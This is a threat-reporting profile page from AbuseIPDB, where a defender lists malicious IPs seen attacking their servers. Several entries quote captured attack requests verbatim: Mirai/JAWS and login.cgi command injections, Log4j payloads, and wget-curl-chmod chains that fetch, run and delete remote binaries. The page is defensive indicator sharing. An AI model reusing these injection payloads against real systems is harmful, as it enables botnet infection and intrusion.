Odie'sInfoSec - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User Odie'sInfoSec joined AbuseIPDB in March 2023 and has reported 31 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇳🇱 212.8.251.176	24 Jul 2023	Mirai Botnet Malware shellcode hosting. IP seen in WGET os command injection attempt from Mirai Bo ... show more Mirai Botnet Malware shellcode hosting. IP seen in WGET os command injection attempt from Mirai Botnet user agent GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws HTTP/1.1 User-Agent: Hello, world show less	Hacking Web App Attack
🇪🇬 156.194.9.137	24 Jul 2023	Mirai Botnet user agent (Hello, World) Attempted OS command injection GET /shell?cd+/tmp;rm+-rf+* ... show more Mirai Botnet user agent (Hello, World) Attempted OS command injection GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws HTTP/1.1 User-Agent: Hello, world show less	Hacking Exploited Host Web App Attack
🇪🇬 41.45.78.22	24 Jul 2023	Mirai Botnet user agent (Hello, World)	Hacking Exploited Host Web App Attack
🇺🇸 34.162.40.10	15 May 2023	Attempted bruteforcing of xmlrpc.php	Hacking Bad Web Bot
🇺🇸 34.125.142.222	15 May 2023	Attempted bruteforce of xmlrpc.php	Hacking
🇺🇸 67.229.72.26	11 May 2023	This IP attempted Mikrotik Winbox RCE Attempt (CVE-2018-14847) according to Suricata	Hacking
🇳🇱 185.161.141.105	11 May 2023	IP was seen on a compromised host. This IP was communicating with PowerShell on port 443. It is li ... show more IP was seen on a compromised host. This IP was communicating with PowerShell on port 443. It is likely command and control / beacon for an attacker using PoshC2 or a similar LOTL framework. show less	Hacking
🇺🇸 34.174.159.76	05 May 2023	Attempted xmlrpc.php login	Hacking Web App Attack
🇺🇸 34.23.33.149	05 May 2023	xmlrpc.php bruteforce <string> Incorrect username or password.</string>	Brute-Force Web App Attack
🇨🇳 8.140.167.137	05 May 2023	Web app attack/ OS command injection. GET /shell?cd+/tmp;rm+-rf+;wget+167.71.210.63/jaws;sh+/tmp/j ... show more Web app attack/ OS command injection. GET /shell?cd+/tmp;rm+-rf+;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1 User-Agent: Hello, world < Mirai botnet user agent Would be prudent to also blacklist their malware hosting server (167.71.210.63) show less	Hacking Web App Attack
🇬🇧 109.205.213.14	05 May 2023	attempted OS command injection on web server. GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205. ... show more attempted OS command injection on web server. GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.3/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1 User-Agent: r00ts3c-owned-you < IOT botnet user agent. Seems like this botnet is an automated search for vulnerable web servers. show less	Hacking Exploited Host Web App Attack
🇨🇦 172.105.18.94	03 May 2023	DROWN attack, (multiple SSLv2 negotiation attempts)	Hacking Web App Attack
🇹🇭 150.107.31.62	26 Apr 2023	this site was referenced in a malicious email link, using site shot it appears to be masquerading as ... show more this site was referenced in a malicious email link, using site shot it appears to be masquerading as an office 365 login to access a blurred document. Their phishing uses a genuine sharepoint site that has a .url file pointing to this site. show less	Phishing Email Spam
🇱🇻 87.246.182.212	13 Apr 2023	This IP resolves to smtp961.selzymail.com It sent a phishing email claiming that the recipient rec ... show more This IP resolves to smtp961.selzymail.com It sent a phishing email claiming that the recipient received an encrypted message with the attachment SecureMessageAtt.htm submitting this .htm file in VirusTotal, the sandboxes flag the behavior as STEALER and MALWARE. If opened, this file will drop several exe files in Temp dir and run them with CMD cmd.exe /C ping 1.1.1.1 -n 1 -w 6000 > Nul & Del "%TEMP%\CSPSNZUKEI.exe show less	Phishing Email Spam Hacking
🇬🇧 134.65.62.64	12 Apr 2023	IP seen in Base64 encoded Log4j RCE attempt. wget http://134.65.62.64/.config/zlib45 ; curl -O h ... show more IP seen in Base64 encoded Log4j RCE attempt. wget http://134.65.62.64/.config/zlib45 ; curl -O http://134.65.62.64/.config/zlib45 ; chmod + show less	Hacking Web App Attack
🇺🇸 66.228.37.189	03 Apr 2023	Shell command execution attempted. (wget http://66.228.37.189/Linuxx86; chmod 777 ; ./Linuxx86 A ... show more Shell command execution attempted. (wget http://66.228.37.189/Linuxx86; chmod 777 ; ./Linuxx86 ApacheV2;rm -rf Linuxx86;curl 66.228.37.189/Linuxx86 --silent -O; chmod 777 *; ./Linuxx86 ApacheV2;rm -rf Linuxx86;wget http://66.228.37.189/Linuxx86;chmod 777 Linuxx86;./Linuxx86 ApacheV2;rm -rf Linuxx86;curl 66.228.37.189/Linuxx86 --silent -O;chmod 777 Linuxx86;./Linuxx86 ApacheV2;rm -rf Linuxx86) show less	Hacking Web App Attack
🇳🇱 89.248.165.52	23 Mar 2023	Suricata alert: ET SCAN ProxyReconBot CONNECT method to Mail Decoded network data: CONNECT smt ... show more Suricata alert: ET SCAN ProxyReconBot CONNECT method to Mail Decoded network data: CONNECT smtp.aol.com:25 HTTP/1.1 Host: smtp.aol.com:25 show less	Hacking Web App Attack
🇸🇰 45.81.243.34	23 Mar 2023	IP address seen in malicious HTTP command injection from Mirai botnet user agent. Possible C2 GET / ... show more IP address seen in malicious HTTP command injection from Mirai botnet user agent. Possible C2 GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws show less	Hacking
🇰🇷 175.215.122.86	23 Mar 2023	Mirai botnet user agent. HTTP command injection GET /shell?cd+/tmp;rm+-rf+;wget+45.81.243.34/jaws ... show more Mirai botnet user agent. HTTP command injection GET /shell?cd+/tmp;rm+-rf+;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1 User-Agent: Hello, world show less	Hacking Web App Attack
🇨🇳 1.116.115.169	23 Mar 2023	Saw this IP in an HTTP command injection attempt, the botnet user agent was trying to wget something ... show more Saw this IP in an HTTP command injection attempt, the botnet user agent was trying to wget something from this IP. Possible C2/Malware hosting server for the Mirai botnet. GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1 show less	Hacking
🇦🇺 60.225.64.129	23 Mar 2023	Mirai botnet user-agent: Hakai/2.0 HTTP command injection: wget request to a possible staging/C2 se ... show more Mirai botnet user-agent: Hakai/2.0 HTTP command injection: wget request to a possible staging/C2 server at 1.116.115.169 GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1 show less	Hacking Web App Attack
🇧🇷 45.145.248.35	23 Mar 2023	IP attempted an Apache Log4j remote code execution (CVE-2021-44228)	Hacking Web App Attack
🇵🇰 175.107.1.170	23 Mar 2023	Attempted administrator bruteforce login on web server GET /boaform/admin/formLogin?username=admi ... show more Attempted administrator bruteforce login on web server GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0 show less	Hacking Brute-Force Web App Attack
🇹🇭 165.154.119.45	23 Mar 2023	This IP attempted a Zabbix v5.4.0 - 5.4.8 SSO/SALM Authentication Bypass (CVE-2022-23131) last night ... show more This IP attempted a Zabbix v5.4.0 - 5.4.8 SSO/SALM Authentication Bypass (CVE-2022-23131) last night on our web server. GET /index_sso.php HTTP/1.1 timestamp: 2023-03-22 23:40 (EST) show less	Hacking Web App Attack
🇪🇹 196.189.162.8	23 Mar 2023	JAWS Webserver Unauthenticated Shell Command Execution Attempt 2023-03-22 20:16 (EST) GET /shell?c ... show more JAWS Webserver Unauthenticated Shell Command Execution Attempt 2023-03-22 20:16 (EST) GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1 User-Agent: Hello, world show less	Hacking Web App Attack